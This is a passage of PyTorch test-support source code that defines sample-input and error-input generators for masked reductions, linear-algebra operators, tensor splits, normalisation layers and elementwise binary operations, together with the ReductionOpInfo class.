**kwargs): """Sample inputs for masked reduction operators that support inputs with sparse coo layouts. """ if op_info.supports_sparse: op_name = op_info.name.replace('_masked.', '') for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse()) yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_name in {'prod', 'amax', 'amin'}: # FIXME: for now reductions with non-zero reduction identity and # unspecified mask are not supported for sparse COO # tensors, see torch._masked.prod implementation # for details. continue yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input.kwargs) def sample_inputs_sparse_csr_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse csr layouts. """ if op_info.supports_sparse_csr: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if not (sample_input.input.ndim == 2 and sample_input.kwargs.get('keepdim')): # - sparse CSR tensors are always 2-D tensors # - masked reduction on CSR tensors are defined only if keepdim is True. continue mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse_csr()) new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_info.name.lstrip('_masked.') in ['prod']: # reductions with non-zero reduction identity and # unspecified mask is not supported for sparse CSR # tensors, see torch._masked.prod implementation # for details. continue new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input.kwargs) yield new_sample if sample_input.kwargs['dim'] == 0: # Reductions of CSR tensors use different implementations for # inner and/or outer dimensions. So, as a minimum of testing CSR # implementations the following kwargs must be generated: # dict(dim=0, keepdim=True) # dict(dim=1, keepdim=True) # dict(dim=(0, 1), keepdim=True) # Here we generate the dim=1 case from the dim=0 case. sample_input_kwargs = new_sample.kwargs.copy() sample_input_kwargs.update(dim=1) yield SampleInput(new_sample.input.clone(), args=sample_input.args, kwargs=sample_input_kwargs) def sample_inputs_masked_norm(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked norm. """ for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() yield SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_masked_std_var(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked std/var. """ for unbiased in [False, True]: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if sample_input.args: dim = sample_input.args[0] sample_input_args = sample_input.args[:1] + (unbiased,) + sample_input.args[1:] sample_input_kwargs = sample_input.kwargs.copy() else: dim = sample_input.kwargs.get('dim') sample_input_args = sample_input.args sample_input_kwargs = dict(sample_input.kwargs, unbiased=unbiased) if requires_grad: if sample_input_kwargs.get('mask') is None: orig_count = torch._masked.sum(torch.ones(sample_input.input.shape, dtype=torch.int64), dim, keepdim=True) else: inmask = torch._masked._input_mask(sample_input.input, *sample_input_args, **sample_input_kwargs) orig_count = torch._masked.sum(inmask.new_ones(sample_input.input.shape, dtype=torch.int64), dim, keepdim=True, mask=inmask) if orig_count.min() <= int(unbiased) + 1: # Skip samples that lead to singularities in var # computation resulting nan values both in var and # autograd output that test_grad_fn cannot handle # correctly. Also, skip samples when the autograd output # for std could not be handled correctly due to torch.sqrt continue yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) # NOTE [Reductions]: # # For testing purposes, we relax the definition of a reduction operator # as defined in the docstring below. We do this to capture operators with # a similar API so they can be tested automatically. However... # # Strictly speaking a reduction operator is an operator that can reduce an # array to a single scalar value and that can be computed from the partial # result of reducing subarrays. This usually means that the reduction operation # should be commutative and associative. This definition is important when it # comes to implementation as it determines how a reduction can be parallelized. # # For example, many summary statistics such as median, mode and quantile cannot # be computed from partial results because these are sorting and counting based # algorithms that need information that would be lost in the reduced value. class ReductionOpInfo(OpInfo): """Reduction operator information. An operator is a reduction operator if it reduces one or more dimensions of the input tensor to a single value. Reduction operators must implement the following signature: - `op(input, *args, *, dim=None, keepdim=False, **kwargs) -> Tensor` ReductionOpInfo tests that reduction operators implement a consistent API. Optional features such as reducing over multiple dimensions are captured in the optional keyword parameters of the ReductionOpInfo constructor. If a reduction operator does not yet implement the full required API of reduction operators, this should be documented by skipping the failing tests rather than adding optional parameters to ReductionOpInfo. NOTE The API for reduction operators has not yet been finalized and some requirements may change. See tests in test/test_reductions.py """ def __init__( self, name, *, # The identity value for the operator if it has one. identity: Optional[Any] = None, # The nan policy for the operator if it implements one. # - propagate: NaN values are propagated to the output # - omit: NaN values are discarded during the reduction nan_policy: Optional[str] = None, # Whether the operator supports reducing multiple dimensions. supports_multiple_dims: bool = True, # Whether the operator promotes integral to floating point dtypes. promotes_int_to_float: bool = False, # Whether the operator promotes all integral dtypes to int64. promotes_int_to_int64: bool = False, # If a specific dtype is given, then the operator always returns that # dtype irrespective of the input dtype. If None, the operator returns # the dtype according to the type promotion rules above. result_dtype: Optional[torch.dtype] = None, # Casts complex results to real (e.g. linalg.norm or torch.var) complex_to_real: bool = False, # ReductionOpInfo tests generate their own input, dim and keepdim # arguments and call this function to generate tuples of extra args and # kwargs to use when calling the op. This is required for operators that # have other required parameters besides the input tensor. generate_args_kwargs: Callable = lambda t, dim=None, keepdim=False: (yield tuple(), {}), # Options from the OpInfo base class **kwargs, ): self._original_reduction_args = locals().copy() assert nan_policy in (None, 'propagate', 'omit') # These are mutually exclusive options assert not (result_dtype and promotes_int_to_float) assert not (result_dtype and promotes_int_to_int64) assert not (result_dtype and complex_to_real) assert not (promotes_int_to_float and promotes_int_to_int64) # Default sample_inputs_func for ReductionOpInfo which augments sample # inputs from sample_inputs_reduction with the args and kwargs from # generate_args_kwargs. This is only used if sample_inputs_func is None. def sample_inputs_func(*args, **kwargs): kwargs['supports_multiple_dims'] = supports_multiple_dims kwargs['generate_args_kwargs'] = generate_args_kwargs yield from sample_inputs_reduction(*args, **kwargs) # Override OpInfo defaults and call base class __init__ kwargs.setdefault('inplace_variant', None) kwargs.setdefault('sample_inputs_func', sample_inputs_func) super().__init__(name, **kwargs) self.identity = identity self.nan_policy = nan_policy self.supports_multiple_dims = supports_multiple_dims self.promotes_int_to_float = promotes_int_to_float self.promotes_int_to_int64 = promotes_int_to_int64 self.complex_to_real = complex_to_real self.result_dtype = result_dtype self.generate_args_kwargs = generate_args_kwargs def sample_inputs_tensor_split(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) args_cases = ( # Cases with tensor indices. (torch.tensor([1, 2, 3]),), (torch.tensor(1),), (torch.tensor([1, 2, 3]), 1), (torch.tensor([1, 4, 2, 5, 3, 6])[::2], 1), # Cases with list of indices. ((2, 4),), ((2, 4), 1), ((2, 4), -1), # Cases with integer section. (3,), (3, 1), (3, -1), ) for args in args_cases: yield SampleInput(make_input((S, S, S)), args=args) def sample_inputs_linalg_det(op_info, device, dtype, requires_grad, **kwargs): kw = dict(device=device, dtype=dtype) inputs = [ make_tensor((S, S), **kw), make_tensor((1, 1), **kw), # 1x1 random_symmetric_matrix(S, **kw), # symmetric random_symmetric_psd_matrix(S, **kw), # symmetric_psd random_symmetric_pd_matrix(S, **kw), # symmetric_pd random_square_matrix_of_rank(S, S - 2, **kw), # dim2_null random_square_matrix_of_rank(S, 1, **kw), # rank1 random_square_matrix_of_rank(S, 2, **kw), # rank2 make_fullrank_matrices_with_distinct_singular_values(S, S, **kw), # full rank make_tensor((3, 3, S, S), **kw), # batched make_tensor((3, 3, 1, 1), **kw), # batched_1x1 random_symmetric_matrix(S, 3, **kw), # batched_symmetric random_symmetric_psd_matrix(S, 3, **kw), # batched_symmetric_psd random_symmetric_pd_matrix(S, 3, **kw), # batched_symmetric_pd make_fullrank_matrices_with_distinct_singular_values(S, 3, 3, **kw), # batched fullrank make_tensor((0, 0), **kw), make_tensor((0, S, S), **kw), ] for t in inputs: t.requires_grad = requires_grad return [SampleInput(t) for t in inputs] def sample_inputs_linalg_det_singular(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype) def make_singular_matrix_batch_base(size, rank): assert size[-1] == size[-2] assert rank > 0 and rank < size[-1] n = size[-1] a = make_arg(size[:-2] + (n, rank)) / 10 b = make_arg(size[:-2] + (rank, n)) / 10 x = a @ b lu, pivs, _ = torch.linalg.lu_factor_ex(x) p, l, u = torch.lu_unpack(lu, pivs) u_diag_abs = u.diagonal(0, -2, -1).abs() u_diag_abs_largest = u_diag_abs.max(dim=-1, keepdim=True).values u_diag_abs_smallest_idxs = torch.topk(u_diag_abs, k=(n - rank), largest=False).indices u.diagonal(0, -2, -1).div_(u_diag_abs_largest) u.diagonal(0, -2, -1)[..., u_diag_abs_smallest_idxs] = torch.finfo(dtype).eps matrix = p @ l @ u matrix.requires_grad_(requires_grad) return matrix def sample_generator(): for batch, size in product(((), (2,), (2, 2)), range(6)): shape = batch + (size, size) for rank in range(1, size): yield make_singular_matrix_batch_base(shape, rank) return [SampleInput(t) for t in sample_generator()] def sample_inputs_linalg_matrix_power(op_info, device, dtype, requires_grad, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_arg_fullrank = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) # (<matrix_size>, (<batch_sizes, ...>)) test_sizes = [ (1, ()), (2, (0,)), (2, (2,)), ] for matrix_size, batch_sizes in test_sizes: size = batch_sizes + (matrix_size, matrix_size) for n in (0, 3, 5): yield SampleInput(make_arg(size), args=(n,)) for n in [-4, -2, -1]: yield SampleInput(make_arg_fullrank(*size), args=(n,)) def sample_inputs_hsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_vsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_dsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),), SampleInput(make_tensor((S, S, 6), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),),) def error_inputs_hsplit(op_info, device, **kwargs): err_msg1 = ("torch.hsplit requires a tensor with at least 1 dimension, " "but got a tensor with 0 dimensions!") si1 = SampleInput(make_tensor((), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.hsplit attempted to split along dimension 1, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_vsplit(op_info, device, **kwargs): err_msg1 = ("torch.vsplit requires a tensor with at least 2 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.vsplit attempted to split along dimension 0, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_dsplit(op_info, device, **kwargs): err_msg1 = ("torch.dsplit requires a tensor with at least 3 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.dsplit attempted to split along dimension 2, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def sample_inputs_linalg_multi_dot(op_info, device, dtype, requires_grad, **kwargs): # Each test case consists of the sizes in the chain of multiplications # e.g. [2, 3, 4, 5] generates matrices (2, 3) @ (3, 4) @ (4, 5) test_cases = [ [1, 2, 1], [2, 0, 2], [0, 2, 2], [2, 2, 2, 2], [2, 3, 4, 5], [5, 4, 0, 2], [2, 4, 3, 5, 3, 2] ] result = [] for sizes in test_cases: tensors = [] for size in zip(sizes[:-1], sizes[1:]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) tensors.append(t) result.append(SampleInput(tensors)) return result def sample_inputs_linalg_matrix_norm(op_info, device, dtype, requires_grad, **kwargs): sizes = ((2, 2), (2, 3, 2)) ords = ('fro', 'nuc', inf, -inf, 1, -1, 2, -2) dims = ((-2, -1), (-1, 0)) inputs: List[SampleInput] = [] for size, ord, dim, keepdim in product(sizes, ords, dims, [True, False]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(SampleInput(t, args=(ord, dim, keepdim))) return inputs def sample_inputs_linalg_norm(op_info, device, dtype, requires_grad, *, variant=None, **kwargs): if variant is not None and variant not in ('subgradient_at_zero',): raise ValueError(f"Unsupported variant, expected variant to be 'subgradient_at_zero' but got: {variant}") test_sizes = [ (S,), (0,), (S, S), (0, 0), (S, 0), (0, S), (S, S, S), (0, S, S), (S, 0, S), (0, 0, 0), ] vector_ords = (None, 0, 0.5, 1, 2, 3.5, inf, -0.5, -1, -2, -3.5, -inf) matrix_ords = (None, 'fro', 'nuc', 1, 2, inf, -1, -2, -inf) inputs = [] for test_size in test_sizes: is_vector_norm = len(test_size) == 1 is_matrix_norm = len(test_size) == 2 for keepdim in [False, True]: if not variant == 'subgradient_at_zero': inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( keepdim=keepdim))) if not (is_vector_norm or is_matrix_norm): continue ords = vector_ords if is_vector_norm else matrix_ords for ord in ords: if variant == 'subgradient_at_zero': inputs.append(SampleInput( torch.zeros( test_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(ord,), kwargs=dict(keepdim=keepdim))) else: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(ord,), kwargs=dict( keepdim=keepdim))) if ord in ['nuc', 'fro']: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( ord=ord, keepdim=keepdim, dim=(0, 1)))) return inputs def sample_inputs_as_strided(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = ( ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ) for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) kwargs = dict(storage_offset=storage_offset) yield SampleInput(input_t, args=(output_shape, stride), kwargs=kwargs) # as_strided on offset, partial views # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2))) # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2)), kwargs={'storage_offset': 0}) def sample_inputs_as_strided_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = [ ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ] samples = [] for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) input_src = make_arg(output_shape) kwargs = dict(storage_offset=storage_offset) samples.append(SampleInput(input_t, args=(input_src, output_shape, stride), kwargs=kwargs)) return samples def sample_inputs_combinations(op_info, device, dtype, requires_grad, **kwargs): inputs = ( (0,), (0, 1), (0, 1, 2, 3), ) rvals = [1, 2, 4] products = product(inputs, rvals, [False, True]) samples = [] for input_data, r, with_replacement in products: input_t = torch.tensor(input_data, device=device, dtype=dtype, requires_grad=requires_grad) kwargs = dict(r=r, with_replacement=with_replacement) samples.append(SampleInput(input_t, kwargs=kwargs)) return tuple(samples) def sample_inputs_cartesian_prod(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(torch.tensor, device=device, dtype=dtype, requires_grad=requires_grad) # constructs 1-D tensors with varying number of elements a = make_arg((0,)) b = make_arg((0, 1)) c = make_arg((0, 1, 2, 3)) samples = [] # sample with only 1 tensor samples.append(SampleInput( a )) # sample with 2 tensors samples.append(SampleInput( a, args=(b,) )) # sample with 3 tensors samples.append(SampleInput( a, args=(b, c) )) return tuple(samples) def sample_inputs_cosine_similarity(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input_shape, dict of dim and eps cases: Tuple[tuple, dict] = ( # type: ignore[assignment] ((S, S), {'dim': 1}), ((S, 2), {'dim': -1}), ((S,), {'dim': 0, 'eps': 0.5}), ((), {'dim': 0}), ((S, S, M), {'dim': 2}), ((S, S), {}) ) for input_shape, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(make_arg(input_shape),), kwargs=kwargs) # Test for Broadcasting yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -2}) yield SampleInput(make_arg((2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) def sample_inputs_batch_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) # Ordered as: input shape, kwargs for training, momentum, eps cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((S, S, S), {'training': True, 'momentum': 0.5, 'eps': 0.6}), ((3, 2, 4), {'training': False, 'momentum': -1.2}), ((3, 1), {'training': True, 'momentum': 0.0}), ((0,), {'training': True}), ((0,), {'training': False}), ((3, 2, 3, 4), {'training': True, 'momentum': -1.0, 'eps': 0.5}), ((3, 2, 3, 4), {'training': False, 'momentum': -1.0, 'eps': 0.5}), ((2, 1), {}), ) for input_shape, kwargs in cases: # args: running mean, running var, weight and bias should necessarily be of shape: (channels,) channels = input_shape[1] if len(input_shape) > 1 else 0 weight = make_arg(channels) if channels > 0 else None bias = make_arg(channels) if channels > 0 else None running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, weight, bias ), kwargs=kwargs ) # Checking for permutations of weights and biases as `None` weights = [channels, None, None] biases = [None, channels, None] is_training = [True, False, False] for weight, bias, training in zip(weights, biases, is_training): yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, make_arg(channels), make_arg(channels) ), kwargs={'training': training} ) # Test case for no optional kwargs # running_mean and running_var are required in evaluation mode (training: False) but not in training mode yield SampleInput(make_arg((1, 2, 3)), args=(None, None), kwargs={'training': True}) def sample_inputs_nn_activation_relu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: yield SampleInput(make_arg(shape)) def sample_inputs_nn_functional_prelu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: for weight in [-1., 0., 0.8, 1.]: weight_tensor = torch.tensor(weight, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg(shape), args=(weight_tensor,)) if len(shape) >= 2: channel_size = shape[1] yield SampleInput(make_arg(shape), args=(make_arg((channel_size,)),)) weight_tensor = torch.tensor(1., device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=weight_tensor,)) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=make_arg((S,)),)) def sample_inputs_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # ord = inf is tested in inputs_norm_inf as it fails on some tests cases = [ ((S, S), (2,), '2'), ((S, S), (0,), '0'), ((S, S), (0.5,), '0_5'), ((S, S), (1,), '1'), ((S, S), (3,), '3'), ((S, S), (-1,), 'neg_1'), ((S, S), (-2,), 'neg_2'), ((S, S), (-0.5,), 'neg_0_5'), ((S, S), (-1.5,), 'neg_1_5'), ] cases_nonzero_input = ( ((S, S, S), (1.5,), '1_5_default'), ((S, S, S), (1.5, 1), '1_5_dim'), ((S, S, S), (1.5, -1), '1_5_neg_dim'), ((S, S, S), (1.5, 1, True), 'keepdim_1_5_dim'), ((S, S, S), (1.5, -1, True), 'keepdim_1_5_neg_dim'), ) cases_posdim = ( ((S, S), (-2, 1,), 'neg_2_dim'), ((S, S), (-1, 1,), 'neg_1_dim'), ((S, S), (0, 1,), '0_dim'), ((S, S), (1, 1,), '1_dim'), ((S, S), (2, 1,), '2_dim'), ((S, S), (3, 1,), '3_dim'), ((S, S, S), (2, 1), '2_dim'), ((S, S, S), (3, 1), '3_dim'), ((S, S, S), (2, 1, True), 'keepdim_2_dim'), ((S, S, S), (3, 1, True), 'keepdim_3_dim'), ((), (2, 0), '2_dim_scalar'), ((), (3, 0), '3_dim_scalar'), ((), (2, 0, True), 'keepdim_2_dim_scalar'), ((), (3, 0, True), 'keepdim_3_dim_scalar'), ) cases_negdim = ((shape, args[:1] + (-args[1],) + args[2:], name.replace("_dim", "_neg_dim")) for shape, args, name in cases_posdim) for shape, args, name in itertools.chain(cases, cases_posdim, cases_negdim): yield SampleInput(make_arg(shape), args=args, name=name) for shape, args, name in cases_nonzero_input: yield SampleInput(make_arg(shape, exclude_zero=True), args=args, name=name) def sample_inputs_norm_fro(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (), 'default'), ((S, S), ('fro',), 'fro_default'), ((S, S), ('fro', [0, 1],), 'fro'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_inputs_norm_nuc(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), ('nuc',), 'nuc'), ((S, S, S), ('nuc', [1, 2]), 'nuc_batched'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_inputs_norm_inf(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (-inf,), '-inf'), ((S, S), (inf,), 'inf'), ((S, S), (inf, 1,), 'inf_2_dim'), ((S, S), (inf, -1,), 'inf_2_neg_dim'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_kwargs_vector_norm(t, **kwargs): # orders with / without identity def ords(): has_id = (6, 4, 2, 1, 0, 0.9) no_id = (inf, -2.1, -inf) if t.numel() == 0: dim = kwargs.get("dim") if dim is None: return has_id if not isinstance(dim, Iterable): dim = (dim,) for d in dim: if t.size(d) == 0: return has_id return has_id + no_id return (((), dict(ord=o)) for o in ords()) # The following functions and classes are for testing elementwise binary operators. # Returns a generator of pairs of contiguous tensors on the requested device # and with the requested dtype. # # This function is intended to test the non-vectorized and vectorized code # paths of elementwise binary functions, as well as their handling of odd tensor # sizes (like zero-dim tensors and tensors with zero elements). # # Each iterable will include an a tensor with no elements, # zero dim (scalar) tensors, small 1D tensors, a medium 1D tensor, and # a large 2D tensor. def generate_elementwise_binary_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False): shapes = ( # tensors with no elements (0,), (1, 0, 3), # zero dim (scalar) tensor (), # small 1D tensor (20,), # medium 1D tensor (812,), # large 2D tensor (1029, 917), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) b = make_arg(shape) yield SampleInput(a, args=(b,)) # Returns a generator of pairs of contiguous tensors on the requested device and with # the requested dtype. # # Unlike the previous function, the values in these tensors are specified manually. def generate_elementwise_binary_small_value_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=None ): if exclude_zero is None: if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) # defines interesting values _unsigned_int_vals = (0, 1, 55, 127, 128, 190, 210, 220, 254) _int_vals = (0, -1, 1, -55, 55, -127, 127, -128) _float_vals = ( 0.0, -0.001, 0.001, -0.25, 0.25, -1.0, 1.0, -math.pi / 2, math.pi / 2, -math.pi + 0.00001, math.pi - 0.00001, -math.pi, math.pi, -math.pi - 0.00001, math.pi + 0.00001, ) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_vals, _float_vals) elif dtype.is_complex: complex_vals = product(_float_vals, _float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int8, torch.int16, torch.int32, torch.int64): prod = product(_int_vals, _int_vals) elif dtype is torch.uint8: prod = product(_unsigned_int_vals, _unsigned_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) if r == 0 and exclude_zero: r_vals.append(1) else: r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_large_value_tensors( op, *, device, dtype, requires_grad=False ): _large_int_vals = (-1113, 1113, -10701, 10701) _large_float16_vals = (-501, 501, -1001.2, 1001.2, -13437.7, 13437.7) _large_float_vals = _large_float16_vals + (-4988429.2, 4988429.2, -1e20, 1e20) l_vals = [] r_vals = [] if dtype == torch.float16: prod = product(_large_float16_vals, _large_float16_vals) elif dtype.is_floating_point: prod = product(_large_float_vals, _large_float_vals) elif dtype.is_complex: complex_vals = product(_large_float_vals, _large_float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int16, torch.int32, torch.int64): prod = product(_large_int_vals, _large_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): _float_extremals = (float("inf"), float("-inf"), float("nan")) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_extremals, _float_extremals) elif dtype.is_complex: complex_vals = product(_float_extremals, _float_extremals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) # Test case for NaN propagation nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan')) lhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad) lhs.flatten()[::3] = nan rhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad) rhs.flatten()[::3] = nan yield SampleInput(lhs, args=(rhs,)) # Returns a generator of pairs of contiguous and noncontiguous tensors that # require broadcasting def generate_elementwise_binary_broadcasting_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=False 